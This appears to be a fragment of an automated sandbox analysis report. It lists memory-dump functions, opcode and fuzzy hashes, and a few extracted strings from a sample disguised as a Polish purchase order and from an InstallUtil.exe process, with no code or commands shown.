Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 747ccc82585ea5c4e2938362d85069e73051f71d63909f3590e9cff283635547
Instruction ID: dbaf6503f95689b905592cae89198aa9c71f6e691bd814f405a921a9e9a14c5f
Opcode Fuzzy Hash: 747ccc82585ea5c4e2938362d85069e73051f71d63909f3590e9cff283635547
Instruction Fuzzy Hash: EDE08C74909208EFCB04EF94E844DADBFB9EB45310F10C1A9DC0627341CB329E96DB81

Function 05F84555 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b491f96ec1f847de704ce9c4e0e2a609997fb4975d0b7fe62d4cab9e590ee815
Instruction ID: 81eae29959411fe2ed6a9e0f1d896a7fdf0a6d712a587d0b1f988aff4028ddf8
Opcode Fuzzy Hash: b491f96ec1f847de704ce9c4e0e2a609997fb4975d0b7fe62d4cab9e590ee815
Instruction Fuzzy Hash: 5EF0157280561ADBDF11DF54C814AEAB776FF64300F108685E54A33290DB31AADACF80

Function 05F82A30 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c53039e78a056f0c338415346a7c98c84c3a47f4e584cf28061319f8c2f26a21
Instruction ID: 44321a5d7b00826a8a2289ceb896db537654c4d1d5b95f6b996483be4a5e5f23
Opcode Fuzzy Hash: c53039e78a056f0c338415346a7c98c84c3a47f4e584cf28061319f8c2f26a21
Instruction Fuzzy Hash: 19E04634904208EFC790EFA8D8456ACBBF9EB08200F2080E98808D3351E632AE41CB40

Function 076F8638 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124728087.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3cf9682e9bd0d46865dbfe0a1a6c3a24c31d5b1ab914d65151f82f5fa610fe7
Instruction ID: 550a0a4d15d5fab1aa12b8dc9ad5aa123e9156cae6592a22b4c6059703409800
Opcode Fuzzy Hash: d3cf9682e9bd0d46865dbfe0a1a6c3a24c31d5b1ab914d65151f82f5fa610fe7
Instruction Fuzzy Hash: C9E04F74D04208EFCB14DFA8D9545ACFBB4EB49304F14C4E9D81967342C6319A02DF40

Function 015ECEE0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111880241.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab615469c814bdea26f3e60b0996c046c26de7ad10c23228b33195a6551894cf
Instruction ID: f0673ee20bf9df43ca8ea04c0a08e63a38799ae98a5f700f7510f48132809a21
Opcode Fuzzy Hash: ab615469c814bdea26f3e60b0996c046c26de7ad10c23228b33195a6551894cf
Instruction Fuzzy Hash: 51E08C71800208DFC711EFB8D908A8E7BF9EB09311F0048A9D50597110EE728A04DBA1

Function 05F87978 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78abc1fe46d2a7590eef57e1eff06ec1dc8f27ad84da5b4ed808b6629508da2b
Instruction ID: 6286221093463cb5e7d59a56b0143ebb53869b4936aae5c16970f29a64406303
Opcode Fuzzy Hash: 78abc1fe46d2a7590eef57e1eff06ec1dc8f27ad84da5b4ed808b6629508da2b
Instruction Fuzzy Hash: 50E0C234909208DBC714EFA4E848BBDFBBAEB46300F20D0DCC80817341CA329E42CB80

Function 05F80550 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b217e721126ed22263a27619e7cb54ba7aba54a46a9ffb88bf556c018aab49c
Instruction ID: 1a7c01ffa8aff2730914f43c2e85c5c645b93063ae0414d3ba446cf2da66d02f
Opcode Fuzzy Hash: 1b217e721126ed22263a27619e7cb54ba7aba54a46a9ffb88bf556c018aab49c
Instruction Fuzzy Hash: 0AE0C2B1C41208EFC710EFF48908A9E7BFCEF05210F0048E5D41597110ED364A14DBA1

Function 05F884D8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78abc1fe46d2a7590eef57e1eff06ec1dc8f27ad84da5b4ed808b6629508da2b
Instruction ID: 8ba139e1fd3f29dd7f6fddea92ff2d67ed3c466c75dff7be28610221f307b94e
Opcode Fuzzy Hash: 78abc1fe46d2a7590eef57e1eff06ec1dc8f27ad84da5b4ed808b6629508da2b
Instruction Fuzzy Hash: 5AE0C234908208DBC704EF98E8459BCBBB8EB46300F50C4DCC80813341CA329E42CB85

Function 05F81880 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78abc1fe46d2a7590eef57e1eff06ec1dc8f27ad84da5b4ed808b6629508da2b
Instruction ID: 884dd93f9768bc33ee255a2e7231012f66302e109313eb78d90a5f83e699d239
Opcode Fuzzy Hash: 78abc1fe46d2a7590eef57e1eff06ec1dc8f27ad84da5b4ed808b6629508da2b
Instruction Fuzzy Hash: F7E0C234D08208EBC714EF94E8499BDBBB8EB45301F10C2D8C80813341C7329E02CF80

Function 05F81FC0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78abc1fe46d2a7590eef57e1eff06ec1dc8f27ad84da5b4ed808b6629508da2b
Instruction ID: b75299cc7fe7ca9b5e200f5757f3c0cabf7a954a52beefea1920fbba4a5dab03
Opcode Fuzzy Hash: 78abc1fe46d2a7590eef57e1eff06ec1dc8f27ad84da5b4ed808b6629508da2b
Instruction Fuzzy Hash: 5CE0C23490820CDFC704EF94E8449BCBBB8EB45300F10C1D8D80823341C7329E02CB81

Function 05F81380 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d01c80d65325a9247370ea587d4c5e0ffaf0055e0430d2745d69effbbf049ed6
Instruction ID: 8fc1217ce135571b5e2e920808ca7940f8fb0712a7fb2eb3b7670bf32cb652a6
Opcode Fuzzy Hash: d01c80d65325a9247370ea587d4c5e0ffaf0055e0430d2745d69effbbf049ed6
Instruction Fuzzy Hash: 70E01274D59208EFC750EFB8D549ABDBFF9EB05301F1041A9880993250E7345A55CB41

Function 076FDE20 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124728087.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de2319be1e8117cf039149257a39354ec6919d2967a84fad4e23fcbd5219ba6c
Instruction ID: 9f9e81d57bb55c0c5071adbc48da1c04a635a703ee4eb7bc1856462e9fe746fb
Opcode Fuzzy Hash: de2319be1e8117cf039149257a39354ec6919d2967a84fad4e23fcbd5219ba6c
Instruction Fuzzy Hash: 12E0C2B4A08208DBC708DFA4E855ABCBFB4EB46304F10C0D8C80913351C732AE42CB80

Function 05F80C98 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3cfeaf29e96dc06f7a423d433fa78ba895225674345e00f7e78c93f64106f6a
Instruction ID: 0130bc1fa4ef4648ca993b59f5d5873735bcd20f3226234ddc9522548d46547a
Opcode Fuzzy Hash: d3cfeaf29e96dc06f7a423d433fa78ba895225674345e00f7e78c93f64106f6a
Instruction Fuzzy Hash: 23E0C230C08208DFC750EFA8D4196BCBFF8EB06201F5480E9C84853342DA369E46CB80

Function 05F826F0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3cfeaf29e96dc06f7a423d433fa78ba895225674345e00f7e78c93f64106f6a
Instruction ID: 8c63e41b7f6eb03082288d9987e26a1b04d2a9e26af2f664a6caf71066758a62
Opcode Fuzzy Hash: d3cfeaf29e96dc06f7a423d433fa78ba895225674345e00f7e78c93f64106f6a
Instruction Fuzzy Hash: 64E0C238808208EFCB10EBA9D8146BCBFB8EB05301F1484D9C80893381D636AE06CB40

Function 076E4E51 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124728087.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ab065b2b104943d3e2496496e8a813f407aa33a0fc2d51569a0cf36def24c05
Instruction ID: c16a76fec2de650a1eb84f1b4725a318215f63d9291c2764d3963acdd5de3522
Opcode Fuzzy Hash: 4ab065b2b104943d3e2496496e8a813f407aa33a0fc2d51569a0cf36def24c05
Instruction Fuzzy Hash: 26E092706001198BC714EF54D4587AE7B72FF96300F204898D10E77280CE745E89CF90

Function 05F829B0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 869c2933ff646d5988a08f778ac3f46528758b85b49787faabaebd36b24d0454
Instruction ID: 3c23c52e501b50b6e1a7c7bb208b0ec0d15f2824f45da0b3943f9f6dc018a25d
Opcode Fuzzy Hash: 869c2933ff646d5988a08f778ac3f46528758b85b49787faabaebd36b24d0454
Instruction Fuzzy Hash: E2D0A734509108DFC714EB98E804A79B7BDEB47314F9484DCD81953341CA37BD01DB50

Function 05F88028 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 869c2933ff646d5988a08f778ac3f46528758b85b49787faabaebd36b24d0454
Instruction ID: fb74614f613ce4075eaafc6d2a60ea55858c16ab8893943f01a464915cfaef1e
Opcode Fuzzy Hash: 869c2933ff646d5988a08f778ac3f46528758b85b49787faabaebd36b24d0454
Instruction Fuzzy Hash: 57D0A730509108DFC754DB94D814A79B7BDEB46354F5484DC9C0953342CA379D01CB80

Function 05F8390D Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3cae61b2681c8f8450e82ebafb0386704a0e76d90269058470d8fddf2029d77
Instruction ID: 361ed9e4fe070d391100afa8fc7f5169ea442aaa473408e5422c89bba71a5bff
Opcode Fuzzy Hash: d3cae61b2681c8f8450e82ebafb0386704a0e76d90269058470d8fddf2029d77
Instruction Fuzzy Hash: CEE01775601209EBCF01DF84C804EEEBBB7FB49340F108010E50D6B2A4C7398880CB80

Function 015E0870 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111880241.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85499704b638fe4498df296278cef57e5b4d8851728b0c8b4a2a70db6293da6c
Instruction ID: 2c5b0492ca6174d3d3e9d4c72655b0d8fa34fdc282e766b587a31663ff5503ac
Opcode Fuzzy Hash: 85499704b638fe4498df296278cef57e5b4d8851728b0c8b4a2a70db6293da6c
Instruction Fuzzy Hash: 2BC012A0E18309AB4758BA7B480C86BBDFDBA85290B404824E006D2144E67055018EF1

Function 076FE1F0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124728087.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eaad9c3c7b3d7a66c98020510a7622fac82384aa9a6881cf31aaee9122400c7
Instruction ID: 4bfc7b604ac7984b9edb26125f73b68e351851c6d1bcd46bba7e78e9cebafa94
Opcode Fuzzy Hash: 2eaad9c3c7b3d7a66c98020510a7622fac82384aa9a6881cf31aaee9122400c7
Instruction Fuzzy Hash: 0CC02BB009A30987C32023647D3C3713EACC303312F407804931F000B296A34454CB51

Function 015E0842 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111880241.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8086f6a5d609f566be777252f9e8aad5d8df6f189780c78bf66863412896a70e
Instruction ID: c06b5b0bc42357ce07b22c6d2d08a4c88fa0f79270ed31b2ebdc857bba686e2b
Opcode Fuzzy Hash: 8086f6a5d609f566be777252f9e8aad5d8df6f189780c78bf66863412896a70e
Instruction Fuzzy Hash: CEC08C2014C3A2CFC34607B0ACAD1913EE0A90221031904F9E040CE193E69809158383

Function 015ECD10 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111880241.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9adfe978868c9a8baa41dc84804b6c0ceacd09be8bf22bcccd4b5f41e8682a8e
Instruction ID: 64c4a999dca300fe4a52901aff83ac1ea3b099465d208a073d4f0833f8618558
Opcode Fuzzy Hash: 9adfe978868c9a8baa41dc84804b6c0ceacd09be8bf22bcccd4b5f41e8682a8e
Instruction Fuzzy Hash: 63C08C300003088BD3683BE8BA0E7AA3FACAB01222F405011E62D061528AB28C51CB66

Function 015E0883 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111880241.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be594a13af9874038dc4c559dd2a6dd25a33b6db82594d6709abb6862cc0b327
Instruction ID: d1877639f664b7428c361b8577e99c909c9c95a6e67a17b39b5d9d0424f91301
Opcode Fuzzy Hash: be594a13af9874038dc4c559dd2a6dd25a33b6db82594d6709abb6862cc0b327
Instruction Fuzzy Hash: 10C04874B24001CF8B88CF28C488868BBE0FF0862074558A9E406DF3A1D77098008B24

Non-executed Functions

Function 015E9048 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

4'jq, xrefs: 015E910F
4'jq, xrefs: 015E913A

Memory Dump Source

Source File: 00000000.00000002.2111880241.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq
API String ID: 0-1204115232
Opcode ID: 1a137bc6cb5b6c40b2f3755c7590bd1b968d2a07c3483dc07f6a2d12c108a619
Instruction ID: f8312009e1f30e9ba0e6627b92d8e5f06c198dfc00cd986f4219b17a05238ba0
Opcode Fuzzy Hash: 1a137bc6cb5b6c40b2f3755c7590bd1b968d2a07c3483dc07f6a2d12c108a619
Instruction Fuzzy Hash: 5D71C570A00609DFD748DF6AF94869EBBF6FF88300F14C539D009AB2A9EB785945DB50

Function 015E9058 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

4'jq, xrefs: 015E910F
4'jq, xrefs: 015E913A

Memory Dump Source

Source File: 00000000.00000002.2111880241.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq
API String ID: 0-1204115232
Opcode ID: fa24b67362824e24f2b5edcfdca49057f008994fb14c5334a0c8b52fa4b7b7cf
Instruction ID: 6c7c9b266d92535167c70aa194d02d2856b9485c27b070b48310e92596b7982e
Opcode Fuzzy Hash: fa24b67362824e24f2b5edcfdca49057f008994fb14c5334a0c8b52fa4b7b7cf
Instruction Fuzzy Hash: 0171B670A00609DFD748DF6AF94869EBBF6FF88300F14C539D009AB2A9DBB85945DB50

Function 05F80006 Relevance: 1.5, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

LRjq, xrefs: 05F80144

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: LRjq
API String ID: 0-665714880
Opcode ID: b4014d4109d3d05c0fd380993511a19c7cae6453625857c06cd2dfb57f95bdf7
Instruction ID: f18a0d82e21a185fd5ac1e2f03f2fb050c07aca130a0c3f5167c295962079757
Opcode Fuzzy Hash: b4014d4109d3d05c0fd380993511a19c7cae6453625857c06cd2dfb57f95bdf7
Instruction Fuzzy Hash: 3AD13770E15208CFDB54DFA9D988BAEBBFAFB49300F548069D409A7395DB385989CF40

Function 05F80040 Relevance: 1.5, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

LRjq, xrefs: 05F80144

Memory Dump Source

Source File: 00000000.00000002.2121543559.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID: LRjq
API String ID: 0-665714880
Opcode ID: dc34039bc377ea5fc361a212a67e62a6f31632a89b240c27f1796835aff1c251
Instruction ID: ca72ba04388447af8f5ce70c05bfe07b67db810eb0aaba5edeb7fbb902e66f51
Opcode Fuzzy Hash: dc34039bc377ea5fc361a212a67e62a6f31632a89b240c27f1796835aff1c251
Instruction Fuzzy Hash: 79C12770E15208CFDB54DFA9D588BAEBBFAFB89300F508069D409A7355EB395989CF40

Function 076FDE60 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124728087.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58540114f8ffa0267b0b98ab8563b006e5a5ffd0a02dad1e39b4d26f729333a0
Instruction ID: fa69f2febd2d74d8127867a85ef6ba0609ef8e0ae93ba8501d3cf003f3aa9bb7
Opcode Fuzzy Hash: 58540114f8ffa0267b0b98ab8563b006e5a5ffd0a02dad1e39b4d26f729333a0
Instruction Fuzzy Hash: B1815BB0E15218CFEB24DFA9C854BEDBBF2BF8A300F148469D50AA7255D7746986CF00

Function 076E0040 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124728087.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddafd9b2eacc5a61a0bf58b9f9452626bd08a7745c2ac4a7b67d57b82f37d74b
Instruction ID: 9c4dbb8ba2b4bd0c9294d9989d7a0616654c40f9f12d85a5cffec553dd84787d
Opcode Fuzzy Hash: ddafd9b2eacc5a61a0bf58b9f9452626bd08a7745c2ac4a7b67d57b82f37d74b
Instruction Fuzzy Hash: 8641E0B1E116198BDB28CF6AC8447DAB6F6AF8A300F14C0EAD40DA7654DB744A858F51

Function 015E9660 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111880241.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad01803b7d53f3f40d039828107ddbafbca0a955761a866e9aacc541b11c342
Instruction ID: 9e819b610453cb6b2da09bfc7c48e896e3626e9397432b62b3e84142145c1544
Opcode Fuzzy Hash: fad01803b7d53f3f40d039828107ddbafbca0a955761a866e9aacc541b11c342
Instruction Fuzzy Hash: F831CBB1E056188BEB28CF6B8D4878EFAF7AFC9304F14C1AAD40CAA255DB740945CF51

Function 015E96C0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111880241.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac6c0a6203fb4149e5614a98c34e0db39a544b809c22b35cc86a2e75f4f6ce5b
Instruction ID: 554186e463adb60a5166657b22b460b02d41a54be5385c00661e93a40bfed7b8
Opcode Fuzzy Hash: ac6c0a6203fb4149e5614a98c34e0db39a544b809c22b35cc86a2e75f4f6ce5b
Instruction Fuzzy Hash: 61316BB1E056188BEB28CF6BC95878EFAF7BFC9304F14C1A9C50CAA255DB750A458F41

Function 076E0022 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124728087.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76e0000_PO-Zam#U00f3wienie zakupu-8837837849-pl-.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98d20bb2ca47ee59350af7f1572be3d6a52e811f19587e5d04f19193d9101e4e
Instruction ID: 6a5233c2710e15fcc418954b358a6251e1fd15070b703c22091a88a69d8b9ed8
Opcode Fuzzy Hash: 98d20bb2ca47ee59350af7f1572be3d6a52e811f19587e5d04f19193d9101e4e
Instruction Fuzzy Hash: 19312BB1D057558BE729CF2B884438ABBF6AFCA200F14C0FA944DAA255DB740A858F11

Analysis Process: InstallUtil.exePID: 3228, Parent PID: 1028COMMON

Executed Functions

Function 0041C0F0 Relevance: 20.9, Strings: 16, Instructions: 855COMMON

Download Yara Rule

Strings

P}@, xrefs: 0041CDC3
X~@, xrefs: 0041CA48
(U@, xrefs: 0041C56A
+, xrefs: 0041CFDB
<`C, xrefs: 0041CD67
P}@, xrefs: 0041C831
<`C, xrefs: 0041CF08
\U@, xrefs: 0041C5F6
<`C, xrefs: 0041C92F
xU@, xrefs: 0041CC7D
<`C, xrefs: 0041C784
xU@, xrefs: 0041CCA5
xU@, xrefs: 0041CC55
d, xrefs: 0041CA9A
xU@, xrefs: 0041C652
<`C, xrefs: 0041CFA6

Memory Dump Source

Source File: 00000002.00000002.3304176080.000000000041C000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3304176080.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3304176080.000000000041A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3304176080.000000000041E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3304176080.0000000000420000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3304176080.0000000000422000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3304176080.0000000000424000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3304176080.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3304176080.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3304176080.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3304176080.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3304176080.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3304176080.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3304176080.000000000045C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallUtil.jbxd

Similarity

API ID:
String ID: (U@$+$<`C$<`C$<`C$<`C$<`C$P}@$P}@$X~@$\U@$d$xU@$xU@$xU@$xU@
API String ID: 0-2099775931
Opcode ID: c261332c9d7cd3dc45ec508d230d78022cbe033b0b9dbf8a4d7c08b4f7e6e4d5
